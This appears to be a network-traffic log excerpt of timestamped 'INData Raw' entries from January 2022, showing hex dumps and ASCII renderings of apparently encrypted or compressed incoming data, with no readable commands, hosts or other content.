                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5326INData Raw: 7c 28 25 7b 89 64 8e 7b d0 bb 74 b8 0b 41 8a 03 e1 da 51 aa 83 37 40 f9 b5 5f e2 da fa d3 71 5f 2f d8 cb 30 1e 3a c8 b2 76 05 ff e8 c5 32 81 b0 58 e7 10 e1 d8 87 d0 1b 11 80 ec 23 b5 34 49 90 e1 72 7d 8b e2 e0 47 3a 90 67 c5 fd 63 2d 44 01 d3 ff 03 84 42 4d e1 d4 3a 87 66 bd 60 ed 1c 10 f7 f8 b9 80 a1 c2 33 f3 0b 79 19 a2 8d c1 95 68 00 9a e6 5e ee 92 a5 2b 97 9d 93 b3 7f 08 92 f8 68 09 14 44 7a 72 1e 31 38 e5 ad 1b 29 f4 a5 e1 29 d3 eb 87 81 e8 c8 42 3b 06 d8 ab ed 78 3a 11 97 27 22 d0 64 26 a7 dc 72 c4 33 35 5d 66 16 be 50 34 d0 46 30 cb a5 1f d0 e7 ab 93 1f 81 31 7e 91 af 80 21 35 18 05 fa d2 56 47 b3 48 79 9b 16 76 6d 56 1e f9 db 13 9c e9 0d 1e bc 6e 98 4b 07 84 cc 00 3c 25 e8 ed b3 07 0f 7c 5a ac 49 cc aa 82 95 36 fb 25 d9 c8 98 3c ca e9 5e 10 64 9c
                                                                                                                                                                                                    Data Ascii: |(%{d{tAQ7@_q_/0:v2X#4Ir}G:gc-DBM:f`3yh^+hDzr18))B;x:'"d&r35]fP4F01~!5VGHyvmVnK<%|ZI6%<^d
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5342INData Raw: 86 79 c3 42 e9 34 db 28 77 e8 35 c6 5f 90 5d 28 cb 6f 91 c9 0c 7a 62 98 db 67 9a b0 4a 92 9c 80 0f 1f 93 b6 04 ab 3d 84 00 97 2f c0 34 b7 5b 53 50 e3 b9 67 17 50 9f e1 4e 6c 31 6a 95 59 fd c7 6d bc 68 97 48 0a 5a d8 57 cb 85 5e 90 b2 30 46 4c 48 2d ac a7 92 ee 9f 9c a3 59 e4 6c 96 cd 37 16 b3 d1 dc 1f 57 7c 63 64 df c1 19 87 ae 82 4e af 8f 6e 57 21 c1 ad ac db 1b e2 69 eb 77 37 6a 5e 9f ab 12 be bb 54 c7 66 a0 51 8c bf e6 17 04 8a 2d 29 ad 4e b6 48 a3 40 9f 53 fd f7 5a c3 cd 99 80 df fa 95 7b ea 0f 64 bb 35 18 c1 da 0e e6 f5 71 5e 93 61 49 3d 21 9d c4 60 19 11 51 02 ea 12 68 c1 f0 9e 18 bb 22 c8 5e a2 48 3f e9 bd f1 66 75 c3 88 76 03 ed 81 70 81 70 38 71 86 01 83 c6 d2 77 c9 c1 a7 0e 69 f3 19 78 d8 fb 69 bc 8e bd 1c ca e0 76 69 e7 3c 07 bc 71 78 24 6b f5
                                                                                                                                                                                                    Data Ascii: yB4(w5_](ozbgJ=/4[SPgPNl1jYmhHZW^0FLH-Yl7W|cdNnW!iw7j^TfQ-)NH@SZ{d5q^aI=!`Qh"^H?fuvpp8qwixivi<qx$k
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5358INData Raw: e6 98 a2 84 83 18 bc 5b fe f1 3b 76 3a f4 df 08 e0 86 41 71 d7 1d 70 22 33 c3 85 5e c4 c3 1d 16 78 4f 0d 05 1c 18 94 95 1a 76 8a 73 b1 b3 e4 e1 0f de a3 45 12 7a a2 9a 02 d7 a5 97 de d6 a9 8d 34 7d a9 c1 ae 44 75 9f 97 1c b5 a0 82 41 cf ed cd 9f ea 4b 83 a3 1b 75 0f f4 e0 9e 46 12 04 3e 73 d9 92 cb 88 e2 f7 49 ee 63 1a 0e ab d5 26 04 bf 66 49 7a 3f 70 b5 11 87 fd 8b 57 77 7e 1e 29 c6 a9 a4 ec 20 e3 99 9b 01 9a e8 43 2b 1c 06 2b f9 57 a5 b5 4b 63 3e 7b b5 7c cc fe 2f 33 09 41 b5 52 ce bd d7 40 26 c6 34 ed d7 93 95 43 25 98 96 71 ec 7d bc ea 0d ee c6 15 4c 0a e6 ba 70 5e 38 99 1c 16 87 3e 70 3f d6 75 da e2 63 00 39 b1 4c 24 de c3 40 aa 14 e5 b4 2b ff 2d 6e da ec 1d b6 e1 13 01 fa 47 38 a5 46 ed 11 23 64 3e 44 f1 86 a7 42 6f 85 aa fe 3f e6 08 77 72 e1 0d 3d
                                                                                                                                                                                                    Data Ascii: [;v:Aqp"3^xOvsEz4}DuAKuF>sIc&fIz?pWw~) C++WKc>{|/3AR@&4C%q}Lp^8>p?uc9L$@+-nG8F#d>DBo?wr=
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5374INData Raw: cd 61 fc d2 a1 21 96 c2 12 77 3c bb 12 eb 90 4a ae fe 2c 20 1f 6b 4f 56 1c 77 20 c5 ef 53 84 b5 49 ab 53 0d 00 9b 96 f3 34 38 c0 c1 6c 49 91 7f c2 8e b7 f3 e6 29 9f 58 7c 44 9f c0 e3 3e e6 46 6a 86 3a 85 ca 06 d1 a6 db 4c 99 5e cd f5 a3 4d 96 dc ac 09 29 1e 69 c3 d8 eb 74 f4 04 54 33 b9 82 db 54 57 0d 09 b0 67 7d f2 21 8d 05 df 5d 66 56 b4 e2 80 50 ed 4f e6 5d 5c 96 ee 2d 4d 68 3a 94 a4 9a 9d 7e e4 23 b5 dd 1c 02 b4 7c 23 0d fd 4e 46 d8 90 b6 43 8b 30 29 16 2f cd fc d3 8e e0 32 f6 1c 53 f3 0f c5 7c d0 74 d7 45 af 80 9e 6c 75 44 31 1f 82 e4 dd 34 c3 11 1b dd ac 95 cd dc c7 d7 a9 93 30 dd a7 db c7 02 9d 2d fa b2 83 15 36 e4 b2 6e 9f 51 f7 12 fe c1 ea 92 1f b5 89 ba 91 b9 bc 9d b1 ac b1 8d 70 66 ff 1d a5 e1 3d c8 1c 9f 89 6c 05 98 53 38 75 2f 30 9c 2b bd 60
                                                                                                                                                                                                    Data Ascii: a!w<J, kOVw SIS48lI)X|D>Fj:L^M)itT3TWg}!]fVPO]\-Mh:~#|#NFC0)/2S|tEluD140-6nQpf=lS8u/0+`
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5390INData Raw: a0 74 79 c3 b6 37 7c b4 79 a8 22 c8 98 f1 76 3e a4 b2 d3 22 60 89 62 a7 4f 46 78 41 c4 c5 e1 40 2e c8 00 ae 4b 7d 10 58 f3 57 ea 2a bb 38 e9 27 af f4 4a e7 36 1d 21 57 ac 8b dc 9f 6d 41 d6 eb ef b8 23 c6 27 c8 10 66 c1 62 b4 93 8a 4f 9c 11 e0 54 96 1a 76 f6 3d 06 91 c1 70 cc be 5d db e2 57 c8 a1 ec ff 99 ef 6a a1 28 3a 5c f0 ad 93 e0 30 52 de 5b 2f c2 07 bf eb 78 b3 8d 4f 77 d4 1b 57 7d c0 a7 ee fd 28 c1 33 b5 d3 a5 88 1c 17 5c c1 c8 fc 4e 36 f4 68 b8 0b 86 40 36 4b 24 da 82 ce 6a cc 88 be 0f 1b 91 23 9a 73 cb c4 ec fc 59 13 4f 86 23 13 bb a1 82 15 db 3d cc 9a 79 9a 87 21 46 40 90 e7 1f ea 19 28 16 fd b3 ec 21 a8 1d 2f 08 ad 7e d5 c2 c1 06 68 a1 fb 5b 67 d3 2b 0a 29 a9 0d 92 e5 4c 16 8d 08 ed 93 7f 74 59 aa 28 fe 9b e2 dc d4 c2 98 97 19 4b 75 d6 39 9e d4
                                                                                                                                                                                                    Data Ascii: ty7|y"v>"`bOFxA@.K}XW*8'J6!WmA#'fbOTv=p]Wj(:\0R[/xOwW}(3\N6h@6K$j#sYO#=y!F@(!/~h[g+)LtY(Ku9
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5406INData Raw: d7 c7 51 62 e7 a0 5f ea a5 84 54 f0 4c 23 71 e5 25 dd 15 f9 f9 a8 42 ee e9 89 eb 79 d0 51 fb 25 a4 69 96 c7 c5 52 b7 0c 94 75 b8 7c 4e 1a 60 b0 2e 33 4e fe 50 bf f5 95 ca 52 c1 db ee f7 54 bb 37 b2 ce 73 df 65 ac ba e6 54 5d 7d 50 06 30 75 aa 85 70 d5 ae 5b 16 4e 0e e6 61 16 95 a9 c4 8c 61 cd 28 19 a7 d1 0b f8 53 a0 18 ea bd af 0a f0 f5 a2 04 33 1e 44 9e a8 d4 11 fc 21 bd 1a c8 1d 6b 3b ec cf 42 a0 4e e2 bb 1e ba 70 55 5f 2c 16 b7 80 26 9c 0e bb d5 4c 64 72 b5 15 9b 66 44 91 8c f5 fc ae 03 2c 90 0c ba 11 5e 00 d1 e1 6e f8 20 ce 79 a5 2a 9b 45 5c 44 87 14 e1 e1 6c d3 9d 40 f4 41 df b2 04 8f 1a 74 73 8b 18 f4 43 43 71 48 96 f9 cd 5e b5 ba 8f c7 c0 aa 0c d6 64 bc 7b 8e 03 04 80 10 4f 09 ba 8e 7a 52 1c 74 83 39 a3 2c b2 e8 14 b4 e1 23 7c 4e e1 2b 6a 37 b8 1f
                                                                                                                                                                                                    Data Ascii: Qb_TL#q%ByQ%iRu|N`.3NPRT7seT]}P0up[Naa(S3D!k;BNpU_,&LdrfD,^n y*E\Dl@AtsCCqH^d{OzRt9,#|N+j7
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5422INData Raw: 2b d7 de a2 7c 40 76 84 94 af 93 8c c7 0e 70 ff 4d ae f0 57 01 4d 58 e2 a3 2e 67 9b bc 81 04 cd 08 04 af ec 4c 01 bb 57 aa 41 b8 e4 76 93 e4 87 18 7d bf 5e f1 a0 a6 db 92 7b 16 33 08 0f 84 01 47 02 c2 b8 74 b0 a3 33 4b e4 2e 73 34 ab de f3 d4 80 6f 75 a2 35 2a e5 41 fc 18 21 27 d6 ef cd 62 46 d5 46 6d 06 6e dc b8 00 30 a6 02 e2 16 9e 7e 74 66 bb eb e3 1e 2c 4f 11 8f a8 8e e0 c9 25 24 08 45 dd 23 a0 86 5b 84 27 ba 15 9d 3f 16 ba 1f 9d 70 24 da c9 8a 78 11 99 10 ef 86 fd a0 02 cb da 09 12 d7 0e e3 e5 2e 1b 1a f2 a5 7a 7d 10 a9 5e aa c7 93 0a 81 d7 a3 ff 7d d4 5f 2d 21 46 e7 de 76 7a 13 17 7f db 15 45 44 18 80 e1 f9 95 cb 5a 90 a3 cc b1 15 ae 87 48 b7 be 08 8b 7e 8e 56 e4 bf ff 36 e7 b7 a5 fb a7 38 62 81 da dc 71 cb c5 1a fc c2 d2 36 94 08 15 88 7d 99 69 3b
                                                                                                                                                                                                    Data Ascii: +|@vpMWMX.gLWAv}^{3Gt3K.s4ou5*A!'bFFmn0~tf,O%$E#['?p$x.z}^}_-!FvzEDZH~V68bq6}i;
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5438INData Raw: ea 72 f8 f4 bf cc d3 ae 7f 74 6b e5 49 3f 88 23 29 73 33 c9 f7 f7 09 d4 f8 3a 50 17 a0 5d 84 16 f4 e6 39 02 46 b5 cf 3b 53 ab 81 5b 39 e3 e2 30 c7 96 b8 15 26 7a 53 55 56 ff 38 4e 1b 58 3a ba 4a 61 d1 bc 08 f3 2b b4 e8 18 0d 54 68 f3 2c 6e 5a aa 78 61 0e c0 ad 5f 86 a1 4e 80 58 7a f1 74 2a 8c 1a f4 3b bc 6a 5a de c2 85 5a 63 a5 19 83 9f df 27 e5 7e 89 bf fa 11 1c 39 99 e0 79 05 78 0b c3 7c 83 a9 7e d8 a3 f5 c5 a3 a0 69 17 30 2d e7 9b ed ee a5 89 7e 91 78 72 58 43 7f 3b c1 e6 42 8e 54 37 32 c7 e4 94 b1 5f 0a 04 a6 48 8e 11 68 63 ad 2a 8a 13 85 a3 7a db e5 da e8 72 6d bd 05 a2 e7 12 61 63 25 98 bb 6c 9b 8f 9b 4d d2 ec 62 b0 67 a3 30 17 f6 ae e7 90 d6 a5 9b 17 ab c7 44 55 e4 dd 4c 18 b1 37 02 df ee af db 3b 10 dc bb 10 06 8e 68 1f cf 15 f7 4c 16 bf e1 af c6
                                                                                                                                                                                                    Data Ascii: rtkI?#)s3:P]9F;S[90&zSUV8NX:Ja+Th,nZxa_NXzt*;jZZc'~9yx|~i0-~xrXC;BT72_Hhc*zrmac%lMbg0DUL7;hL
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5454INData Raw: 4b 40 1b 88 b6 44 2a 51 d0 b9 1c 10 d4 5e 1e 4c 59 00 50 06 53 4f 9b 25 68 39 48 1a ed fb 4d 2e fa ce 62 6d 77 62 cf 70 77 9e eb 80 95 3e ed a8 10 d5 c9 6b ac 52 fb ec fd c7 8c 98 ac 32 a8 b1 17 d9 77 84 7a 2c 81 d2 33 5e 3e 2a 8f b7 70 33 5c 35 76 00 41 46 a6 f5 7d 65 b3 31 74 b7 b8 20 79 a5 54 20 bf 4d 4f 0f 34 73 0d 3c 20 b4 7d 56 23 50 d4 c3 af 9f 17 b6 ca 8d 4b ac 2b 03 14 81 97 1f 45 4e 03 0f b8 36 cb f2 7e 4a 14 8b 4f 32 bd 4e 50 3e 38 91 65 2a e9 9d 40 9e f0 c4 50 5f 50 ab 36 be 62 6d 73 8a 82 21 f4 a7 ac 58 c7 c4 ee be 76 98 da db 24 f0 35 60 26 23 05 2d da 97 cd 5e 52 e7 ef 60 a4 e0 9a d5 d2 4b a7 e7 de 54 19 a7 96 c5 89 c5 f4 a3 11 1c 3f 2f e2 04 0d 04 82 3e 2b 9e 42 e6 e0 13 aa 08 c7 84 3b 13 d7 a8 d3 c7 ac 4d 1c 59 e7 c6 47 04 40 fb 4d 48 8f
                                                                                                                                                                                                    Data Ascii: K@D*Q^LYPSO%h9HM.bmwbpw>kR2wz,3^>*p3\5vAF}e1t yT MO4s< }V#PK+EN6~JO2NP>8e*@P_P6bms!Xv$5`&#-^R`KT?/>+B;MYG@MH
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5470INData Raw: 80 b2 ae 13 98 7b 40 14 7d 84 91 44 1e 11 40 62 6a 13 8d 9a 1e 51 37 b9 53 b7 2a 34 b4 fc ff d4 c3 07 35 8b 5a 56 d7 5c a3 8b 36 a5 dc c9 2c 73 d1 02 d6 7e d2 42 56 6d fb 9f 37 ef 15 d9 0c 1f fd 3e 44 b4 60 f0 11 f7 d4 a0 24 0e 7e 27 be 07 72 ed 80 91 6b cd 3f 9d e4 08 f2 48 0f d8 7b 5b e6 11 d0 0f 11 e1 b5 b1 0d 3f d5 c0 0a c5 34 77 19 3f 6a 93 af fb d9 6b ba dc 38 77 2c 14 79 97 1f 59 59 c9 b8 e0 1d 54 e0 86 e4 7a 7b 3b 0f f5 21 96 2a 02 29 ee 22 02 12 bd 6c 6f a0 48 e4 b2 24 29 c5 f5 fe d4 a4 a9 3b d4 35 65 83 48 2a 87 d6 7f fd b2 87 40 4a ea 5b 54 21 5d 54 0c fc 36 4c f0 72 89 e9 c0 af 47 24 b8 22 ab b0 b7 98 0c 77 8c 0e 83 53 7b a5 74 9f c1 89 ca d0 33 1b c6 3a 84 ee 56 90 c6 61 10 33 ae 5a 1f b6 8c 43 96 f5 71 00 e7 75 3d 07 bb a6 d6 46 7a 72 a8 ef
                                                                                                                                                                                                    Data Ascii: {@}D@bjQ7S*45ZV\6,s~BVm7>D`$~'rk?H{[?4w?jk8w,yYYTz{;!*)"loH$);5eH*@J[T!]T6LrG$"wS{t3:Va3ZCqu=Fzr
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5486INData Raw: 01 ed bf 2c c7 31 ac 60 ed 7e 0c 4a 1d a5 aa c6 94 d2 ee b7 bd 38 b7 51 6d 39 33 5e e4 91 33 6f ba cb 05 82 98 5b 61 8e 43 25 a5 e5 a9 74 df f8 b7 ea c2 ee 6c ed a5 cc a3 3a da 18 d4 7a 1c f6 f0 ab d7 36 fb c4 79 4e b4 52 2c 73 46 fb e7 c5 d1 1e 95 8a c2 a7 d7 d6 cc 54 d4 bb e7 18 b7 47 db 37 ed 41 b7 00 e0 bd 07 59 95 c4 c6 a0 fe 67 99 e8 a8 a8 d9 a2 39 55 93 ff 13 46 2c 87 16 4c 73 24 c3 3e e6 4e 4b d9 57 29 fa 43 96 56 a5 56 72 e0 27 3b ae af f4 91 8f d2 24 9e 60 7e fc 28 61 e0 26 cb 99 3f d1 c5 fb 7c 70 d5 bb 44 e9 e3 6a 79 76 bd df 5a 39 29 a5 7c 04 cd 45 cc d1 f4 73 b3 58 b5 60 b5 1d d0 56 d2 2d ea cb b3 d3 be b9 50 ec fb a3 3b cc cf 7e b7 25 f6 35 ef cf 74 9e e7 af 80 95 b1 c9 cb 99 83 45 98 fa 89 78 23 1b c8 9f c8 13 0f 1f 23 66 da cc df 29 d2 43
                                                                                                                                                                                                    Data Ascii: ,1`~J8Qm93^3o[aC%tl:z6yNR,sFTG7AYg9UF,Ls$>NKW)CVVr';$`~(a&?|pDjyvZ9)|EsX`V-P;~%5tEx##f)C
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5502INData Raw: d3 a6 fc 65 08 7e 23 d6 3a 87 b8 b3 0d 07 ed 0d 70 03 bf 51 ec fa ac 47 b1 13 28 18 1f ed 75 d7 6d 10 3b 14 66 06 0c 06 57 0b 28 63 d3 33 80 e7 ba 46 18 be 19 05 c6 ff 49 31 cf e3 34 db d2 08 a2 3e 41 20 ff 21 2b 67 f7 e5 68 6a a6 16 a4 4b c9 02 f1 aa e5 aa 19 2a 63 d6 80 83 47 d3 87 39 e1 b3 13 b7 d1 51 fb 80 78 6a 63 19 f1 a6 12 75 34 b0 1d 84 62 fb 21 c2 e3 e6 1f 67 60 8f 79 ad ed 90 b0 e7 1c dc 25 55 88 08 04 24 03 73 e4 2a 00 a9 a6 3d 4a d9 aa 20 8f 5e 9f d0 3a f9 a7 5b d3 02 f2 20 d5 1c e4 28 12 4e 87 9d a2 c6 b8 39 96 30 1c f2 1f 9b d3 6c 6d a0 78 45 d1 44 72 46 54 52 5b 89 65 95 12 f2 b7 77 36 b1 88 b9 b1 f3 cd 2b 24 5a 1a 4f ac 46 cc 07 b5 aa 45 d1 c4 c5 40 42 04 14 d2 00 c4 f6 45 1e 46 35 17 11 e1 1b 0e f1 d0 db 32 13 78 b4 e9 fa 11 be 09 9c db
                                                                                                                                                                                                    Data Ascii: e~#:pQG(um;fW(c3FI14>A !+ghjK*cG9Qxjcu4b!g`y%U$s*=J ^:[ (N90lmxEDrFTR[ew6+$ZOFE@BEF52x
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5518INData Raw: a4 d6 b2 bc 18 79 b4 07 40 a6 86 08 87 b9 02 02 53 96 39 b1 22 78 fa 7e 7f 12 28 1f 0d 90 2e 8f 25 4e 5b bb 5f 7d 9a 18 e5 87 2a 4b 05 52 6a 45 9d 8c 76 92 24 52 c2 2d 42 c4 2c 7b 5d 83 23 69 2b 07 b0 7a 83 19 e6 74 e9 14 10 58 e2 1e 5e 00 e8 60 14 b1 2e 44 bb de 8a 88 6d bd 54 f1 cc b9 8e cb 2d 10 08 2d 2d 2b 50 f0 00 80 ed 8f 8d d0 a1 50 a0 0e bd 69 e5 0d 41 1d 8d 21 5e 75 35 96 44 5c 32 cc 35 3b 41 da f7 3f 8d 79 5b 1f 76 7a e9 1a e3 5f 16 93 4c 6a 05 d2 d4 8c dd 8d d4 04 f2 4e aa 49 ad c5 79 8f 8f 5d 6d 59 3e fe 8b a8 a5 af 5a 7a 21 5c 81 7c 45 15 39 35 b9 0b fa 2e 45 37 73 de 6d 6b 03 24 9a 90 2f 0e 1b ef ad c7 cd 7b 98 2c aa 2d f4 01 2a e4 f1 bd 29 ed da 86 07 8a 02 e2 94 17 74 c0 aa b7 6a 6b 3e b2 25 26 7f fb 08 c6 bc b2 f8 36 68 80 3e 30 c4 8e f6
                                                                                                                                                                                                    Data Ascii: y@S9"x~(.%N[_}*KRjEv$R-B,{]#i+ztX^`.DmT---+PPiA!^u5D\25;A?y[vz_LjNIy]mY>Zz!\|E95.E7smk$/{,-*)tjk>%&6h>0
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5534INData Raw: 86 16 71 84 02 bb c3 21 10 d6 d0 f2 61 58 c1 85 ab ed 9c fb e0 ce bb 5c 2a 18 96 8b 2b bc 31 fd 0b 22 9d 9d 4f 60 58 fe 23 7b 6a 5c 23 dc 92 b8 05 a9 37 cc ff 4a 2f 30 0a aa 35 f5 91 00 ab 2f ac 6a 1e e7 3d ec c2 79 4a 70 87 e5 38 82 17 49 92 60 d8 e5 8e d1 bf f8 05 14 24 a6 9a df a7 ae cc 2b db 95 82 95 92 f6 f9 d9 88 25 6d 6c 3e 39 92 1c 4e da b6 4d 2c bb 2e 1b bf f9 59 17 e7 e0 e8 08 ee f9 3a 5d fe 4f b8 f8 ed 6a 86 c7 6d 4f 16 75 dd 58 0a 97 c6 1b 94 b2 02 30 a1 bc 7c 51 0c be b4 8e ed 4a 41 6a d6 1d 22 1e 29 c8 3e 95 c0 d3 0f 1f 56 69 55 5e 42 9e 21 27 15 83 37 31 74 95 79 a0 0d ff 29 56 08 09 ff 49 e1 7a 01 48 fe 36 03 a5 07 e0 1e 07 da 99 a8 15 c6 36 fe 66 3c 31 37 d1 27 27 dd 61 d1 ae bc d5 80 69 05 91 85 d5 75 57 35 15 75 0a a9 23 21 16 29 59 11
                                                                                                                                                                                                    Data Ascii: q!aX\*+1"O`X#{j\#7J/05/j=yJp8I`$+%ml>9NM,.Y:]OjmOuX0|QJAj")>ViU^B!'71ty)VIzH66f<17''aiuW5u#!)Y
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5550INData Raw: 35 43 68 2c 7b 36 bc 56 e3 b6 dc 49 21 59 cb b9 cd 09 f8 d3 5f 45 25 73 ac e3 18 92 80 91 83 e9 e6 aa ba c4 a0 47 d5 73 ae c2 a6 d2 12 2d 2c 85 ea 6a f0 eb e6 31 87 c6 67 d4 20 15 35 9c ac 54 c0 ad 8d 08 e0 a9 24 a7 85 19 11 af 0c 26 ef 86 55 06 cc 42 88 b9 70 ea 7b 59 eb 5f 6b 57 f4 60 a9 ab 28 6b 57 33 9d 53 a0 2d 5a 69 21 0a 52 bc c1 6e 70 e9 4f 0e ba cd e2 2a ff 8b 0e 04 ab e4 d6 85 a7 b2 f6 7a 17 ef 03 8a fb 80 43 00 df 27 f0 ba ea 34 e4 67 e2 b2 c5 75 fa e8 f3 50 c8 41 e0 80 a4 10 6e 19 6a 22 a6 fb c6 ea c3 5a 43 23 f6 90 2f 26 90 4e bf 99 5e 93 22 e2 d0 63 ef f1 05 fa e6 17 6c 4a cb 62 3c d8 66 ae 25 7b cd 59 5d 64 d6 a7 43 9d 20 3e 12 20 90 fd bb 6d 15 0b 1d 87 93 b4 b2 fa 21 9c 0e 94 f8 5b 14 63 4d 3c 2e 4e ff 96 fe bc 64 5c 50 ff f5 3f db 3f a5
                                                                                                                                                                                                    Data Ascii: 5Ch,{6VI!Y_E%sGs-,j1g 5T$&UBp{Y_kW`(kW3S-Zi!RnpO*zC'4guPAnj"ZC#/&N^"clJb<f%{Y]dC > m![cM<.Nd\P??
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5566INData Raw: 93 73 3b 01 0f 84 24 5d 4a 07 fb a3 a0 a6 8b 20 f9 73 94 4d c1 41 d0 90 50 4f 98 d0 49 d7 1e a2 1d 14 12 70 e4 b2 f2 59 f4 fd 8c 03 a9 c6 6e fd a0 7f e2 22 1c de 45 6c af a6 da 12 c2 0c 69 30 4d 57 f0 72 cf b7 e3 6c c6 8b e0 76 5d 8d a3 69 da af f8 46 cd c0 31 bd 86 42 12 99 5a 86 b5 10 36 0b b1 6f 36 bd 84 12 f3 4a 17 66 67 a7 c5 20 2d 96 61 61 a1 30 e5 2d a0 8a 49 d8 59 2d 42 a2 27 86 21 de 38 34 36 c7 9d ca a5 02 91 77 77 c9 a2 6e 2a e3 9b 8b b7 50 c0 db 03 da 5c 53 b5 0f 06 69 19 2a 0a c1 e1 0a 79 0c 3f 63 e2 87 c1 88 97 29 dc db c2 c6 9b 28 19 8c c0 1d c7 60 ac 49 1e a5 2b c8 a5 a2 dd d9 9e 0d 75 b8 53 9c 02 f6 ea d6 3d 7f 4e cd 9b 3f f1 8c ec 01 2a db 2d 8d 6b 05 16 4b 22 a1 81 97 18 2a 02 af 25 22 67 4e c3 29 e0 57 a5 43 02 2c 4f 99 9c 17 b4 0b ec
                                                                                                                                                                                                    Data Ascii: s;$]J sMAPOIpYn"Eli0MWrlv]iF1BZ6o6Jfg -aa0-IY-B'!846wwn*P\Si*y?c)(`I+uS=N?*-kK"*%"gN)WC,O
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5582INData Raw: 9d 23 58 af 52 08 63 74 b5 f1 c9 6d eb 1b 73 d4 16 6f d7 48 d9 ce 24 7f 0e 54 34 66 f8 45 5a 1b 2b 15 7c 60 b4 22 bb 10 e8 f3 16 eb 33 d8 d4 5e 13 8b 5a 88 ac 2c 76 56 50 1b 82 f9 50 91 f9 4c 94 17 44 97 f5 80 82 e2 df 70 e4 3c 62 34 f7 92 ef 20 cf e9 52 07 f3 b6 29 e6 29 83 5e 23 db c4 ab 83 89 c4 00 6e 1a 20 d2 81 fe 2f 93 7f 65 a6 b7 6a 63 1d 86 e0 a9 c6 8b e3 9b 27 ba 89 e3 f5 56 4f 94 40 1f 2e 38 d9 96 99 20 39 00 7b 49 71 51 09 63 ea 65 c0 c1 66 a9 12 a3 55 09 e7 db e0 13 44 e9 89 f7 99 ab 90 a1 b5 1d cc 59 b4 39 91 1b 96 3e d2 e5 80 2c d5 94 84 24 f4 aa e2 58 ad 1e 0e 04 4c a7 be 0b b9 f7 f0 b2 43 52 c6 b7 a0 e4 0a f8 79 08 ef 0f 97 04 69 8f 71 a9 fa a7 21 d2 f2 d0 be c4 3d ee 6a 9f 0b 44 06 f0 6f 57 ff 1b 35 4b ba 85 1a 85 3b 98 fc 11 66 ce 5b 76
                                                                                                                                                                                                    Data Ascii: #XRctmsoH$T4fEZ+|`"3^Z,vVPPLDp<b4 R))^#n /ejc'VO@.8 9{IqQcefUDY9>,$XLCRyiq!=jDoW5K;f[v
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5598INData Raw: 9b 35 9f 39 85 a2 82 0a 80 c6 6f de f0 54 6d 3e 26 b8 85 f2 e1 29 9d b4 d3 ac 09 e1 db 6a 0d 2c 9b f8 42 2b 0d 1c 24 fe e9 4f 91 c3 be 12 69 33 de 66 97 79 e4 31 5d 32 53 77 0a 27 55 19 a1 0c 5c 85 4e 5d c9 36 e8 51 99 08 db 94 e5 69 cb f1 4e ca 01 6a a7 84 16 50 61 5a 85 dc 96 e6 8a 5d 96 59 32 15 ce 1a b9 bd 95 62 4c f8 6f 1a 86 06 b6 2d 66 2a 52 48 58 56 d7 cd 88 1e 96 f1 34 70 93 83 27 63 5c f7 ba 93 4e 91 61 8b 2d 56 b9 0b 8f 86 3b 4c 6b de 1a db 0b 2b bb 9b 76 31 bf f0 83 64 d2 74 9f cb e9 75 43 17 a1 32 47 90 7a 51 51 52 a2 48 ff d9 ec ce 96 48 ff c3 e6 16 68 a6 c5 6a 28 2a 38 ff 39 d6 2e c5 6b b9 7c f7 f5 34 5d b3 12 41 81 cc 6d f0 6d bd ac 60 4b a8 9c 7e c4 ba 59 1d 95 0b d2 bb 05 1c 1a d4 fb 40 a4 21 17 0e 18 0e 6a 2d 36 26 f4 39 da 2c bc 05 f6
                                                                                                                                                                                                    Data Ascii: 59oTm>&)j,B+$Oi3fy1]2Sw'U\N]6QiNjPaZ]Y2bLo-f*RHXV4p'c\Na-V;Lk+v1dtuC2GzQQRHHhj(*89.k|4]Amm`K~Y@!j-6&9,
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC5614INData Raw: 7a d8 44 a4 ec 0b e2 2c b9 7b e4 70 3f 8e 60 12 df 2a 11 18 48 89 6d ff 72 52 a2 6f 8c 9a 28 d1 b1 da a0 4c d4 87 dd 8f 0a a9 56 0b 49 f7 9f eb 52 6b 4e 05 61 60 4a 3e ce ef 61 c3 72 3d 95 7c 2d 6e 1d 39 27 89 a4 0b e6 b0 79 4c f2 69 5c 41 b4 0c 95 ed 70 73 ab bc c7 f8 be 0e 5c 06 73 c8 49 d4 fa b5 27 23 e0 d7 2a a5 6d 4e 3a 4b e1 da 3a 0d 45 96 ee d0 87 f6 bc e7 42 e1 9f 8f dc 36 db 1c bb f3 f1 84 d3 c7 ea df db 53 82 2c 39 c5 64 92 00 61 ea 19 ab 64 b5 98 60 3e 64 c1 4b d2 c9 25 2b 98 5a 7f 70 66 a9 33 4f df d8 e9 4e 58 17 96 56 97 50 4c b2 a4 0f fa 53 8b 7b f8 a0 6f 9f 1c fc 65 e9 e7 74 80 5e 8f 96 43 f8 57 13 c2 6a 89 9c f1 90 f1 6d c9 a2 34 7f e8 da aa f9 08 ef bd ee 69 2f f8 4e f3 1d a9 61 e6 2a 57 c4 ba 1d 58 76 cf 1d 25 6f 7f 89 80 12 92 ce cc 9d
                                                                                                                                                                                                    Data Ascii: zD,{p?`*HmrRo(LVIRkNa`J>ar=|-n9'yLi\Aps\sI'#*mN:K:EB6S,9dad`>dK%+Zpf3ONXVPLS{oet^CWjm4i/Na*WXv%o
